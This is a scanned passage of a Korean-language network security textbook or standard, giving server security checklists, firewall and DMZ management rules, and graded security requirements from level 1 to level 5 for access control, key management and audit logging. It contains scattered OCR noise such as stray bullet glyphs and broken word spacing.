^ 가입등록 ID 및 통과암호는 주기적으로 바꾸는가? 

^ CRON 표를 검사하는가? 

一 체 계 

^ 체계파일검사를 통제하는가? 

^ setuid , setgid 프로그람을 감시하는가? 

^ startup 파일 을 관리하는가? 

^ 여 벌복사된 OS 파일과 가동중인 OS 파일을 검사하는가? 

^ 장치 파일 (/ dev / kmem ,/ dev / drum ,/ dem / mem ) 을 검 사하는가? 

ᄄ 봉사데몬상태 가 정 상인가? 

며 가동중인 프로쎄스가 이상은 없는가? 

一 망 

^ 인증받지 않은 사용자에 대한 망접근을 통제하는가? 

^ 봉사포구에 대한 통제가 이루어지는가? 

^ NFS/NIS 보안관리가 유지되는가? 

^ 가장 최신판본으로 교체하였는가? 

5.1.7. 봉사기의 보안관리도구적용 

1) 도입배경 

— 복잡하지 않고 효률적 으로 운영 할수 있는 S / W ( GUI 환경 )가 요구되 고 완전하고 종 
합적 인 방책 에 의한 체 계 보안관리 요구 

— 완전성강화측면 

주요업 무처 리 를 지 속적 으로 수행 하기 위하여 요구되 는 확신을 제 공해 주고 장애 발생 시 
자료복구기능을 강화하여 야 한다. 

一 생 산성 증대 즉면 

반복되는 작업의 단순화와 자동화，작업과정의 관리와 표준화，오유방지를 통해 문제 
점을 조기발견하고 사용자가 원하는 정보를 정확하게 제공하여야 한다. 

2) 기존체계의 보안문제점 

— 보안의 취약성 

여 OS 기 본구성 방식 이 공개되 였기때 문에 중앙집 중적 인 보안관리 가 미 약하고 방책관리 
가 대 단히 어렵 다. 

여 보안규칙의 위반사항，추적，감시기능이 미약하다. 

여벌복사의 관리와 여벌복사자료의 보호가 어렵다. 
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^ 원격여벌복사가 불편하다. 

ᄄ 순서화기능이 미 약하다. 

^ CRON ： 작업의 련관관계 인식불량 / 단위별 Contml 기능이 빈약하다. 

^ 말단운영자동화 기능이 없고 사건을 조종하지 못한다. 

^ 입 출력완충 및 보고관리 가 불편하다. 

ᄄ 장애발생시 자동감시 및 관리기능이 빈약하다. 

一 UNIX / NT 의 보안 
^가입등록조종관련 
^ 지정된 시간만 허용 
^ 일시적 권한허용 

^ 통과암호위 반시 자동으로 사용자 ID 를 제한 
며 말단에 따라 권한 부여 ( IP 나 장치이름구분) 

^ 자원에 대한 조종관련 

^ 누가 어떤 자원을 어떻게 사용할수 있어야 하는가를 정의 
I 모 자원에 대 한 구분정의 ( Files , Commands , Administration function 등) 

^ 해 당 자원에 대 한 접 근준위，시 간과 날자，완충기접 근 정 의 
^감시조종관련 

ᄄ 특정한 사건발생시 감시 가 가능하게 되 여있 다. 

며 지정된 업무외의 행위를 감시할수 있어 야 한다. 

^ 가입등록된 사용자의 경 로를 모두 감시할수 있 어 야 한다. 

^ 기정으로 지정된 자원관련 

정의되지 않은 자원의 사용불가능 (File create 등) 

i 모 방책 에 근거한 보안관리측면 

자원에 부여한 허 용범 위 외 에 특정한 사용자에 대 한 권한 혹은 접 근범 위 를 지 정 
^ 보안감시 를 위한 기 능 
실시간 감시 및 보고 

3) 적용계획 

一 매 지 역의 보안담당자는 우에서 서술한 요구조건을 반영 하는 보안도구를 적 용한다. 
一 도구적 용시 검 토사항 

^ 각종 도구의 체계와의 호환성，안전성 이 보장되는가. 

^ 각종 도구가 우의 요구조건을 만족하는가. 

ᄄ 가격 대 성능 비교 
ᄄ 여 러 봉사기의 통합관리가 가능한가. 

一 적용절차 
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ᄄ 사용자정의 

매 사용자별로 기존체계의 허용범위를 적용하며 사용자별 허용시간，허용말단을 설 
정，통과암호 5회 위 반시 자동으로 해 당 가입등록 ID 를 일시 적 으로 사용중단 
ᄄ 사용자그룹정의 
^자원그롭정의 

사용자그롭을 기 준으로 해 당자원의 접 근준위 를 정 의 (가장 낮은 권한을 부여 하는것 을 원 
칙으로 함) 

^개발자원허용정의 

그룹에서 정의된 자원에 대한 권한외에 특정한 자원에 대한 별도의 권한적용 
^ 통합관리 체 계 구현(회 복기 능추가) 

매 봉사기 를 하나의 중앙집 중적 인 봉사기체계 로 운영할수 있도륵 구축하여 보안담당 
자의 감시 및 위 반사항보고가 가능하도록 구현 

5.1.8. 봉사기의 보안관리운영계획 

1) 필요성 

봉사기 보안관리를 통하여 인증되지 않는 불법사용자로부터 봉사기사용을 방지 하고 인 
증된 사용자의 정 보자원을 보호하여 효률적 인 봉사기 보안관리를 진행 하기 위 해서 이 다. 

2) 활동방향 

一 전반적 인 측면에서의 보안관리 활동과 대 책을 수립한다. 

一 사용하기 쉬 운 정 보관리 와 포괄적 인 정 보보호를 유지한다. 

一 정의된 보안방책에 대한 실행결과를 분석하고 효과적인 보안활동을 추진한다. 

3) 보안관리활동범위 
—사용자계정검사 

ᄄ 특권사용자계정검사 
ᄄ 사용자쉘검사 
ᄄ 홈등록부검사 
^ UID 를 공유한 계정검사 
ᄄ 최근 추가 및 삭제된 계정검사 
一 가입등록된 파라메터검사 
I 〒 실패한 가입등록시 도검 사 
ᄄ 일정한 기 간동안 사용되지 않은 계정검사 
며 통과암호가 없는 사용자검사 
^ 폐기된 통과암호를 가진 사용자 
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^ 쓰기가능한 파일검사 

^ 사용자의 파일과 등록부에 대 한 소유권과 권한검사 

一 체계 파일 

파일과 등록부의 정확한 속성을 지정하고 발생된 변화를 검사 

一 봉사기보안검사목록 

봉사기검 사목록에 따른 보안관리활동수행 

5.1.9. 인터네트의 보안관리준칙 

인터네트의 구성요소별 보안관리 준칙 

1) 구성요소정의 

一 차페 식 경 로기 (Screened router ) 

방화벽 으로의 IP 되 돌리 기기 능과 파케트러 과기 능을 가지 며 내 부망과 외 부망의 유일 
한 경로에 위 치 한 경로기 이 다. 

— 공개 정 보망 (Information subnet ) 

인 터네 트를 통하여 외 부에 공개 되 는 정 보가 존재하는 망으로서 다음의 2개 의 망으로 
구성된다. 

^ DMZ(Public segment ) : 통과암호검사 등 기본적 인 인증이 나 인증절차를 거 치지 않 
는 봉사기 들이 위 치하는 정 보망 

여 Secured Zone ： 외부의 인증된 사용자(해외사무소 등)들에게 내부의 정보 및 체계 
를 제 공하는 봉사기 들이 위 치하는 정 보망 

2) 관리준칙 

一 N/W 

^ 인터네트를 리용한 모든 외부망에서 사설망내부에로의 접속시도는 방화벽 을 통해 
서 만 접 근이 가능하고 별도의 뒤문은 설정하지 않는다. 

^ 인 터 네 트를 통한 외 부에 서 내 부망으로의 접 속은 목적 지 가 공개 정 보망일 경 우에 만 허 
용한다. 

^ 전용망을 통하여 인터네트와 련결되는 모든 기관들은 인터네트와 같은 외부망과 련 
결될수 없다. 

^ 인터네 트접 속 경 로조종통신규약은 사설망과 접 속된 망의 경 로조종통신규약과 류사 
하게 관리한다. 

^ 사설망안에서 사설망외부로의 파일송신은 차단한다. 

一 봉사기 ( mail , WWW , DNS ) 

^ DNS 봉사기는 사설망안의 사용자들이 인터네트를 리용할 때에만 사용하고 사설망 
외부로부터의 주소응답봉사는 하지 않는다. 
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@ 봉사기의 특권사용자의 통과암호는 한달에 한번씩 변경하며 특권사용자의 변경시 즉 
시 변경한다. 

^ mail , WWW 등은 외 부에 바로 련결 되 고 체 계장애시 파일 의 회 복은 할수 없 다. 

^ 봉사기의 사용자통과암호는 6~8자로 하며 하나이상의 특수문자 및 영문자를 포함 
한다. 

一 방화벽 

^ 모든 사설망외부로부터 의 접속은 방화벽체 계의 인증절 차를 거 처 인증된 사용자만 
이 사용가능하게 한다. (사용자는 방화벽 을 인식 하지 못한다. ) 

^ 모든 사설망외부에서 사설망내부체계의 인증된 사용자들은 한달에 한번씩 확인되 
며 사용권한사항의 변경시(직무변경，퇴 직)에는 체계관리 자의 승인을 받은 다음 변경한다. 

^ 방화벽에 위협환경이 조성되였을 때 내부 및 외부 N/W 련결은 경로기에서 근원 
적으로 차단한다. 

ᄄ 방화벽체계의 복구는 원칙적으로 디스크초기화로부터 다시 시작한다. 

ᄄ 방화벽체계에는 봉사응용통신규약，대리자봉사기，조작체계외에 어떠한 체계도 설 
치하지 않는다. 

ᄄ 방화벽체계에는 특권사용자외에 그 어떤 계정도 허용하지 않는다. 

^ 사설망외부에서 내부로의 모든 접속시도는 등록관리되며 인증시 세번이상의 통과 
암호입력오유로 가입등록이 실패되면 그 사용자의 접속시도는 차단되며 그 결과는 별도의 
관리 를 거 쳐 우편 ( mail ) 으로 보고된 다. 

^ 외부의 인증되지 않는 사용자들의 패런을 규칙화하여 규칙에 해당하는 접속시도가 
있으면 즉시 보고된다. 

—응용프로그람체계 

^ 모든 사설망외부의 인증된 사용자들에게 제공하는 사설망안의 체계들은 보안령역 
(Secured Zone ) 에 두고 사용자들은 암호화된 문서를 주고받는다. 

^ 인터네트에서 모든 경우 정보 및 체계자원은 사전에 체계관리자의 승인을 받은 다 
음후 제공된다. 
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제2절. 보안체계의 등급별 기준 

보안체계완성기준은 국가의 기관，기업소 및 단체들의 특성에 따라 보안체계에 대한 등 
급을 제시하고 매 등급별로 기준을 정 한다. 

등급은 6단계로 구분하며 1등급에서부터 순차적으로 보안등급이 높아진다. 기밀성기 
능이 제 공되 는 경 우에 는 매 평 가등급의 뒤 에 〈〈 H 》 자를 불여 서 표기한다. 

5.2.1. 콤퓨터망 1급보안기준 

1급은 콤퓨터망의 최소한의 보안을 목적으로 한다. 

1) 1급의 신분확인기능은 보안기술체계에 접근하는 관리자를 식별 및 인증한다. 

2) 1급의 임의의 접근통제기능은 보안기술체계에 접근 또는 보안기술체계를 통하여 이 
루어지는 모든 접속에 대하여 보안속성에 기초한 임의의 접근동제규칙을 적용하여 접근 
을 통제 하여 야 한다. 

임의의 접근통제기능만을 포함한다. 

3) 1급의 기밀성 에 는 전송자료기 밀성，암호열쇠 관리 기능과 암호연산을 포함한다. 

(1) 전송자료기밀성기능은 보안기술체계를 통하여 전송되는 자료가 허용되지 않은 사 
용자에게 로출되 였을 경우 그 내용이 알려지는것을 방지 하기 위하여 자료를 암호화할수 있 
어 야 한다. 

(2) 암호열쇠관리는 다음의 요구기능을 가져 야 한다. 

① 암호열쇠는 암호와 관련된 목적으로만 사용되여 야 하며 주기적으로 변경될수 있 
어 야 한다. 

② 암호열쇠관리기능은 암호열쇠의 임의성을 보장할수 있는 열쇠생성수단을 제공 
할수 있어 야 한다. 

③ 암호열쇠관리기능은 외부로부터 허용되지 않은 공격에 대처할수 있는 안전한 열 
쇠분배 수단을 제 공할수 있 어 야 한다. 

④ 암호열쇠 관리기 능은 저 장된 열쇠 에 대 하여 허 용되 지 않은 공격 에 대 처할수 있 
는 안전한 열쇠저 장 수단을 제 공할수 있어 야 한다. 

⑤ 암호열쇠 관리기 능은 유효하지 않은 열쇠 를 안전하게 파기할수 있는 수단을 제 
공할수 있어 야 한다. 

⑥ 암호열쇠 관리 기 능은 허 용된관리 자에 게 암호열쇠 속성 을 설정 및 변경 할수 있는 기 
능을 제공할수 있어 야 한다. 

⑦ 암호열쇠 관리기 능은 열쇠 관리 와 관련된 사건에 대 하여 사건기 록을 생성할수 있 
어 야 한다. 
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(3) 암호연산은 다음의 요구기능을 가져 야 한다. 

① 암호연산은 안전성 이 검증된 암호알고리듬과 암호열쇠의 크기 에 따라 수행될 
수있어 야 한다. 

② 암호연산과 관련된 사건에 대하여 사건기록을 생성할수 있어야 한다. 

4) 보안기 술체 계 관리 기 능은 관리 자가 다음의 기 능들을 수행할수 있도륵 하여 야 한다. 
모든 접근 및 보안체계를 통한 접속에 대하여 적용되는 임의의 접근통제규칙의 설정， 
조회，변경 및 삭제 

5.2.2. 륭퓨터망 2급보안기준 

2급은 콤퓨터 망에 서 사용자와 자료를 분리 시 키 고 자료보호를 실시한다. 

1) 2급의 신분확인기능은 보안체계에 접근하는 관리자를 식별 및 인증하여야 한다. 

2) 2급의 접근통제기능은 임의의 접근통제기능만을 포함하다. 

3) 2급의 기밀성 에는 전송자료기 밀성，암호열쇠 관리 기능과 암호연산을 포함한다. 

(1) 전송자료기밀성기능은 보안기술체계를 통하여 전송되는 자료가 허용되지 않은 사 
용자에게 로출되였을 경우 그 내용이 알려지는것을 방지하기 위하여 자료를 암호화할수 있 
어 야 한다. 

(2) 암호열쇠관리는 다음의 요구기능을 가져 야 한다. 

① 암호열쇠는 암호와 관련된 목적으로만 사용되여 야 하며 주기적으로 변경될수 있 
어 야 한다. 

② 암호열쇠관리기능은 암호열쇠의 임의성을 보장할수 있는 열쇠생성수단을 제공 
할수 있어 야 한다. 

③ 암호열쇠관리기능은 외부로부터 허용되지 않은 공격에 대처할수 있는 안전한 열 
쇠분배 수단을 제 공할수 있 어 야 한다. 

④ 암호열쇠 관리기 능은 저 장된 열쇠 에 대 하여 허 용되 지 않은 공격 에 대 처할수 있 
는 안전한 열쇠저 장수단을 제 공할수 있어 야 한다. 

⑤ 암호열쇠 관리기 능은 유효하지 않은 열쇠 를 안전하게 파기할수 있는 수단을 제 
공할수 있어 야 한다. 

⑥ 암호열쇠 관리 기 능은 허 용된관리 자에 게 암호열쇠 속성 을 설정 및 변경 할수 있는 기 
능을 제공할수 있어 야 한다. 

⑦ 암호열쇠관리기능은 열쇠관리와 관련된 사건에 대하여 사건기록을 생성할수 있 
어 야 한다. 

(3) 암호연산은 다음의 요구기능을 가져 야 한다. 

① 암호연산은 안정성 이 검증된 암호알고리듬과 암호열쇠의 크기 에 따라 수행될수 
있어야 한다. 

广、之髮) 암호연산과 관련된 사건에 대하여 사건기록을 생성할수 있어야 한다. 
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4) 사건기록 및 추적기능은 다음의 매 사건에 대하여 사건기록을 생성하여야 한다. 

(1) 사건기록 및 추적기능의 생성요구는 다음과 같다. 

① 보안체계의 시동 및 완료 

② 사건기록의 시작 및 완료 

③ 관리자의 신분확인관련자료의 설정 및 변경 

④ 관리자에 대한 식별 및 인증 

⑤ 자동접근통제규칙의 설정，변경 및 삭제 

⑥ 통신 및 통신규약의 시 작 및 완료 

⑦ 사용자의 신분확인관련자료의 설정，변경 및 삭제 

⑧ 사용자에 대한 식별 및 인증 

(2) 사건기록에는 다음의 정보가 기록되여 있어야 한다. 

① 날자와 시간 

② 사건의 형태 

③ 사건의 성공 또는 실패 여부 

④ 실패한 사건의 경 우 실패리유 

(3) 생성된 사건기 록파일은 외부적 인 보조기 억 장치에 도 저 장할수 있어 야 한다. 

(4) 사건기록파일은 관리자가알아 볼수 있어야 하며 관리자가 리 해 할수 있는 형태로 제 
공되여 야 한다. 

5) 보안관리 기 능은 관리 자가 다음의 기 능을 수행할수 있도록 하여 야 한다. 

① 모든 접근 및 보안기술체계를 통한 접속에 대 하여 주체와 객체간에 적용되는 임의 
의 접근통제규칙의 설정，조회，변경 및 삭제 

② 관리자신분확인관련자료의 설정，조회 및 변경 

③ 사건기록대상의 설정，조회，변경，추가 및 삭제 

④ 사건기록파일의 조회，삭제 및 초기화 

⑤ 보조기 억장치에 사건기록파일의 생성 

⑥ 사용자신분확인관련자료의 설정，조회，변경 및 삭제 

5.2.3. 콤퓨터망 3급보안기준 

3급에 서 는 콤퓨터 망에 대 하여 가입 등록 및 감시 추적 기 능을 위 한 요구사항이 강화된 접 
근보호를 실시한다. 

1) 신분확인기능은 보안기술체계에 접근하는 관리자를 식별 및 인증하여야 한다. 

2) 접근통제기능은 임의의 접근통제 규칙만을 포함한다. 

3) 완전성 에 포함된 자료완전성과 전송자료완전성의 요구사항은 다음과 같다. 

(1) 자료완전성 기 능은 보안기 술체 계 가 관리하는 다음의 자료가 허 용되 지 않을 방법 
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으로 변경되였는지를 확인할수 있어야 한다. 

① 관리자 및 사용자의 신분확인관련 자료 

② 자동접근통제규칙 

(2) 전송자료완전성기 능은 보안기 술체 계 를 통해 전송되 는자료의 변경 이 발생할 경 우 
이를 확인할수 있어야 한다. 

4) 기밀성 은 전송자료기 밀성，암호열쇠 관리 기능과 암호연산을 포함한다. 

(1) 전송자료기밀성기능은 보안기술체계를 통하여 전송되는 자료가 허용되지 않은 사 
용자에게 로출되 였을 경우 그 내용이 알려지는것을 방지 하기 위하여 자료를 암호화할수 있 
어 야 한다. 

(2) 암호열쇠관리는 다음의 요구사항을 가져 야 한다. 

① 암호열쇠는 암호와 관련된 목적으로만 사용되여야 하며 주기적으로 변경될수 있 
어 야 한다. 

② 암호열쇠관리기능은 암호열쇠의 임의성을 보장할수 있는 열쇠생성수단을 제공 
할수 있어 야 한다. 

③ 암호열쇠관리기능은 외부로부터 허용되지않은 공격에 대처할수 있는 안전한 열 
쇠분배 수단을 제 공할수 있 어 야 한다. 

④ 암호열쇠 관리기 능은 저 장된 열쇠 에 대 하여 허 용되 지 않은 공격 에 대 처할수 있 
는 안전한 열쇠저 장수단을 제 공할수 있어 야 한다. 

⑤ 암호열쇠 관리기 능은 유효하지 않은 열쇠 를 안전하게 파기할수 있는 수단을 제 
공할수 있어 야 한다. 

⑥ 암호열쇠 관리기 능은 허 용된 관리 자에 게 암호열쇠속성 을 설정 및 변경할수 있는 
기능을 제 공할수 있어 야 한다. 

⑦ 암호열쇠 관리기 능은 열쇠 관리 와 관련된 사건에 대 하여 사건기 록를 생성할수 있 
어 야 한다. 

(3) 암호연산은 다음의 요구기능을 가져 야 한다. 

① 암호연산은 안전성 이 검증된 암호알고리듬과 암호열쇠의 크기에 따라 수행 
될수 있어야 한다. 

② 암호연산과 관련된 사건에 대 하여 사건기 록를 생 성할수 있 어 야 한다. 

5) 사건기록 및 추적기능은 다음의 매 사건에 대하여 사건기록을 생성하여야 한다. 
(1) 사건기록 및 추적기능의 생성요구 

① 보안기술체계의 시동 및 완료 

② 사건기록의 시작 및 완료 

③ 관리자신분확인관련 자료의 설정 및 변경 

④ 관리자에 대한 식별 및 인증 

⑤ 임의의접근통제 규칙의 설정，변경 및 삭제 
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⑥ 통신 및 통신규약의 시 작 및 완료 

⑦ 사용자신분확인관련 자료의 설정，변경 및 삭제 

⑧ 사용자에 대한 식별 및 인증 

⑨ 자료완전성 위 반 

⑩ 전송 자료완전성을 위반한 통신 및 통신규약 

(2) 사건기 록에 는 다음의 정 보가 기 록되 여있 어 야 한다. 

① 날자 및 시 간 

② 사건의 형태 

③ 사건의 성공 또는 실패 여부 

④ 실패한 사건의 경 우 실패리유 

(3) 생성된 사건기 록파일은 외부적 인 보조기 억 장치에 도 저 장할수 있어 야 한다. 

(4) 사건기록파일은 관리자가 알아볼수 있어야 하며 관리자가 리해할수 있는 형태로 
제공되 여 야 한다. 

(5) 사건기록 및 추적 기능은 사건기록를 저장할 기 억장소가 없거 나 용량이 부족한 경 
우 관리 자 활동만을 허 용하여 야 하며 관리 자에 의 한 기 억 장소 복구조치 후 사건기 록를 생 
성 및 기록할수 있어 야 한다. 

(6) 사건기 록 및 추적 기 능은 속성 별로 사건기 록를 검 색할수 있 어 야 한다. 

6) 보안기술체 계 관리 기 능은 관리 자가 다음의 기능을 수행할수 있도륵 하여 야 한다. 

① 모든 접근，보안체계를 통한 접속에 대하여 임의의 접근통제규칙의 설정，조회，변 
경 및 삭제 

② 관리자 신분확인관련 자료의 설정，조회 및 변경 

③ 사건기록대상의 설정，조회，변경，추가 및 삭제 

④ 사건기록파일의 조회，삭제 및 초기화 

⑤ 보조기 억장치에 사건기록파일생성 

⑥ 사용자 신분확인관련 자료의 설정，조회，변경 및 삭제 

⑦ 사건기록에 대한 속성별 검색기능의 설정 및 취소 


5.2.4. 콤퓨터망 4급보안기준 

4등급은 보안기술체계의 매 요구사항별로 표식을 붙여 일관성있으면서도 체계적 이고 
또한 임의의 및 강제적보호를 실시한다. 


1) 신분확인 

(1) 신분확인기능은 보안기술체계에 접근하는 관리자를 식별 및 인증하여야 한다. 

(2) 신분확인기능은 인증수단의 최소길이，조합규칙，변경주기를 제공하여야 한다. 

(3) 신분확인기 능은 사용자 및 관리 자를 인증하기 위하여 사용된 정 보를 재 ᅳ 
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공격 에 대 처 할수 있는 수단을 제공하여 야 한다. 

(4) 신분확인기능은 응용봉사접속후 일정시간동안 응답하지 않는 상태일 때 다시 인 
증하여 야 한다. 

2) 접근통제 

(1) 임의의 접근통제기능은 보안기술체계에 접근 또는 보안기술체계를 통하여 이루 
어지는 모든 접속에 대하여 보안속성이 기초한 임의의 접근동제규칙을 적용하여 접근을 통 
제 하여 야 한다. 

(2) 강제 적 접 근통제기 능은 보안기 술체 계 에 접 근 또는 보안기 술체 계 를 통하여 이 루 
어지는 모든 접속에 대 하여 보안준위 에 기 초한 강제 적 인 접 근동제 규칙을 적 용하여 접 근을 
통제하여 야 한다. 

3) 완전성 

(1) 자료완전성 기 능은 보안기 술체 계 가 관리하는 다음의 자료가 허 용되 지 않은 방법 
으로 변경되였는지를 확인할수 있어야 한다. 

① 관리자 및 사용자의 신분확인관련 자료 

② 임의의 접근통제규칙 

③ 강제적 접근통제규칙 

④ 보안기 술체 계 를 구성하는 실 행파일 

(2) 전송자료완전성기 능은 보안기 술체 계 를 통해 전송되 는 자료에 변경 이 발생할 경 
우 이를 확인할수 있어야 한다. 


4) 기밀성(선택사항) 

(1) 전송자료기밀성기능은 보안기술체계를 통하여 전송되는 자료가 허용되지 않은 사 
용자에게 로출되였을 경우 그 내용이 알려지는것을 방지하기 위하여 자료를 암호화할수 있 
어 야 한다. 

(2) 암호열쇠관리 

① 암호열쇠는 암호와 관련된 목적으로만 사용되여야 하며 주기적으로 변경될수 
있어 야 한다. 

② 암호열쇠관리기능은 암호열쇠의 임의성을 보장할수 있는 열쇠생성수단을 제 
공할수 있어 야 한다. 

③ 암호열 쇠 관리 기 능은 외 부로부터 허 용되 지 않은 공격 에 대 처 할수 있는 안전한 열 
쇠분배 수단을 제 공할수 있 어 야 한다. 

④ 암호열 쇠 관리 기 능은 저 장된 열 쇠 에 대 하여 허 용되 지 않은 공격 에 대 처 할수 있 
는 안전한 열쇠저 장수단을 제 공할수 있어 야 한다. 

⑤ 암호열쇠 관리기 능은 유효하지 않은 열쇠 를 안전하게 파기 할수 있는 수단을 제 
공할수 있어 야 한다. 
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⑥ 암호열쇠관리기능은 허용된 관리자에게 암호열쇠속성을 설정 및 변경할수 있 
는 기능을 제 공할수 있어 야 한다. 

⑦ 암호열쇠관리기능은 열쇠관리와 관련된 사건에 대하여 사건기록를 생성 할수 있 
어 야 한다. 

(3) 암호연산 

① 암호연산은 안전성 이 검증된 암호알고리듬과 암호열쇠의 크기에 따라 수행 
될수 있어야 한다. 

② 암호연산과 관련된 사건에 대하여 사건기록를 생성할수 있어야 한다. 


5) 사건기록 및 추적 

(1) 사건기 록 및 추적 기 능은 다음의 사건에 대 하여 사건기 록을 생 성하여 야 한다. 

① 보안기술체계의 시동 및 완료 

② 사건기록의 시작 및 완료 

③ 관리자신분확인관련 자료의 설정 및 변경 

④ 관리자에 대한 식별 및 인증 

⑤ 임의의 접근통제규칙의 설정，변경 및 삭제 

⑥ 통신 및 통신규약의 시 작 및 완료 

⑦ 사용자 신분확인관련 자료의 설정，변경 및 삭제 

⑧ 사용자에 대한 식별 및 인증 

⑨ 자료의 완전성위반 

⑩ 전송자료완전성을 위반한 통신규약 

⑪ 강제적인 접근통제규칙의 설정，변경 및 삭제 
⑫ 보안준위 정보의 설정，변경 및 삭제 

(2) 사건기 록에 는 다음의 정 보가 기 록되 여있 어 야 한다. 

① 날자와 시간 

② 사건의 형태 및 중요도 

③ 사건의 성공 또는 실패 여부 

④ 실패한 사건의 경 우 실패리유 

(3) 사건기 록 및 추적기 능은 사건기 록를 저 장할 기 억 장소가 없거 나 용량이 부족할 가 
능성이 있을 경우 다양한 방법으로 관리자에게 알릴수 있는 수단을 제공하여야 한다. 

(4) 생성된 사건기 록파일은 외부적 인 보조기 억 장치에 도 저 장할수 있어 야 한다. 

(5) 사건기록파일은 관리자가 알아볼수 있어야 하며 관리자가 리해할수 있는 형태로 
제공되여 야 한다. 

(6) 사건기 록 및 추적기 능은 사건기 록를 저 장할 기 억 장소가 없거 나 용량이 부족할 가 
능성 이 있는 경 우 관리 자의 활동만을 허 용하여 야 하며 관리 자에 의한 기 억 장소 
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건기록를 생성 및 기록할수 있어 야 한다. 

(7) 사건기록 및 추적기능은 속성 별로 사건기록의 검색 및 통계 자료를 제공할수 있 
어 야 한다. 

(8) 사건기록 및 추적기능은 다음의 사건발생시 다양한 방법으로 관리자에게 알릴수 
있는 수단을 제공하여야 한다. 

① 신분확인기능위반 

② 임의의 접근통제규칙 및 강제적접근통제규칙위반 

③ 자료의 완전성 및 전송자료의 완전성위반 

6) 보안기술체계관리 

(1) 보안기 술체 계 관리 기 능은 관리 자가 다음의 기 능을 수행할수 있도륵 하여 야 한다. 

① 모든 접근 및 보안기술체계를 통한 접속에 대하여 주체와 객체간에 적용되 
는 임의의 접근통제규칙의 설정，조회，변경 및 삭제 

② 관리자신분확인관련자료의 설정，조회 및 변경 

③ 사건기록대상의 설정，조회，변경，추가 및 삭제 

④ 사건기록파일의 조회，삭제 및 초기화 

⑤ 보조기억장치에 사건기록파일생성 

⑥ 사용자신분확인관련의 자료의 설정，조회，변경 및 삭제 

⑦ 사건기록에 대한 속성별 검색기능의 설정 및 취소 

⑧ 모든 접근 및 보안기술체 계를 통한 접속에 대 하여 주체 와 객체간에 적 용되 
는 강제적인 접근통제규칙의 설정，조회，변경 및 삭제 

⑨ 보안준위정보의 설정，조회，변경 및 삭제 

(2) 보안관리기 능은 보안기 술체 계 가 제 공되 는 일 반적 인 응용봉사의 특성별로 안전하 
게 운영될수 있는 수단을 제공하여 야 한다. 

(3) 보안관리 기 능은 외 부보조기 억 장치 에 보안기 술체 계 를 구성하는 중요내 용을 적 재 
하고 복구하는 수단을 제 공하여 야 한다. 


5.2.5. 륭퓨터망 5급보안기준 

5등급은 콤퓨터 망에 서 믿 음성 있는 보안기 능들을 서 로 분리하여 적 용하며 장치 들의 표 
식 화를 실현하여 구조적 인 보안을 실시한다. 


1) 신분확인 

① 신분확인기능은 보안기술체계에 접근하는 관리자를 식별 및 인증하여야 한다. 

② 신분확인기능은 원격지에서 보안체계에 접근하는 관리자를 식별 및 호상인증하여 
야 한다. 

’신분확인기능은 보안기술체계에 접근하는 사용자를 식별 및 인증하여야 한다. 
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④ 신분확인기능은 인증수단의 최소길이，조합규칙，변경주기를 제공하여야 한다. 

⑤ 신분확인기능은 사용자 및 관리 자를 인증하기 위 하여 사용된 정보를 재사용하는 공 
격에 대처할수 있는 수단을 제공하여야 한다. 

⑥ 신분확인기능은 응용봉사접속후 일정시간동안 응답하지 않는 상태일 경우 재인증 
하여 야 한다. 

2) 접 근통제 

① 임의의접근통제기능은 보안기술체계에 접근 또는 보안기술체계를 통하여 이루어지 
는 모든 접속에 대 하여 보안속성 에 기 초한 임의의 접 근통제 규칙 을 적 용하여 접 근을 동제 하 
여 야 한다. 

② 강제 적 인 접 근통제기 능은 보안기 술체 계 에 접 근 또는 보안기 술체 계 를 통하여 이 루 
어지는 모든 접속에 대 하여 보안준위 에 기 초한 강제 적 접근동제 규칙 을 적용하여 접근을 동 
제 하여 야 한다. 

3) 완전성 

(1) 자료완전성 기 능은 보안기 술체 계 가 관리하는 다음의 자료가 허 용되 지않은 방법으 
로 변경되였는지를 확인할수 있어야 한다. 

① 관리자 및 사용자의 신분확인관련자료 

② 임의의 접근통제규칙 

③ 강제 적 인 접 근통제 규칙 

④ 보안기 술체 계 를 구성하는 실 행파일 

전송자료완전성기능은 보안기술체 계를 통해 전송되는 자료에 변경 이 발생할 경우 이 
를 확인할수 있어야 한다. 

4) 기밀성(선택사항) 

전송자료기 밀성기 능은 보안기 술체 계 를 통하여 전송되 는 자료가 허 용되 지 않은 사용자 
에게 로출되 였을 경우 그 내 용이 알려지는것 을 방지 하기 위하여 자료를 암호화할수 있어 
야 한다. 

(1) 암호열쇠관리 

① 암호열쇠는 암호와 관련된 목적으로만 사용되여야 하며 주기적으로 변경될 
수 있어야 한다. 

② 암호열쇠관리기능은 암호열쇠의 임의성을 보장할수 있는 열쇠생성수단을 제 
공할수 있어 야 한다. 

③ 암호열쇠관리기능은 외부로부터 허용되지않은 공격에 대처할수 있는 안전한 
열쇠분배수단을 제공할수 있어 야 한다. 

④ 암호열쇠 관리 기 능은 저 장된 열쇠 에 대 하여 허 용되 지 않은 공격 에 대 제수 있 

는 안전한 열쇠저장수단을 제공할수 있어야 한다. = 
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⑤ 암호열쇠관리기능은 유효하지 않은 열쇠를 안전하게 파기할수 있는 수단을 제 
공할수 있어 야 한다. 

⑥ 암호열쇠관리기능은 허용된 관리자에게 암호열쇠속성을 설정 및 변경할수 있 
는 기능을 제공할수 있어 야 한다. 

⑦ 암호열쇠관리기능은 열쇠관리와 관련된 사건에 대 하여 사건기록을 생성 할수 
있어야 한다. 

(2) 암호연산 

① 암호연산은 안전성 이 검증된 암호알고리듬과 암호열쇠의 크기에 따라 수행 
될수 있어야 한다. 

② 암호연산과 관련된 사건에 대하여 사건기록를 생성할수 있어야 한다. 

5) 사건기록 및 추적 

(1) 사건기 록 및 추적 기 능은 다음의 사건에 대 하여 사건기 록를 생 성하여 야 한다. 

① 보안기술체계의 시동 및 완료 

② 사건기록의 시작 및 완료 

③ 관리자 신분확인관련 자료의 설정 및 변경 

④ 관리자에 대한 식별 및 인증 

⑤ 원격으로 접근하는 관리자에 대한 식별 및 호상인증 

⑥ 임의의접근통제규칙의 설정，변경 및 삭제 

⑦ 통신 및 통신규약의 시 작 및 완료 

⑧ 사용자신분확인관련 자료의 설정，변경 및 삭제 

⑨ 사용자에 대한 식별 및 호상인증 

⑩ 자료완전성 위 반 

⑪ 전송자료의 완전성을 위반한 통신 및 통신규약 
⑫ 강제적인 접근통제규칙의 설정，변경 및 삭제 
⑬ 보안준위정보의 설정，변경 및 삭제 
⑭ 보안기술체계관리 프로쎄스의 정지 

(2) 사건기 록에 는 다음의 정 보가 기 록되 여있 어 야 한다. 

① 날자와 시간 

② 사건의 형태 및 중요도 

③ 사건의 성공 또는 실패 여부 

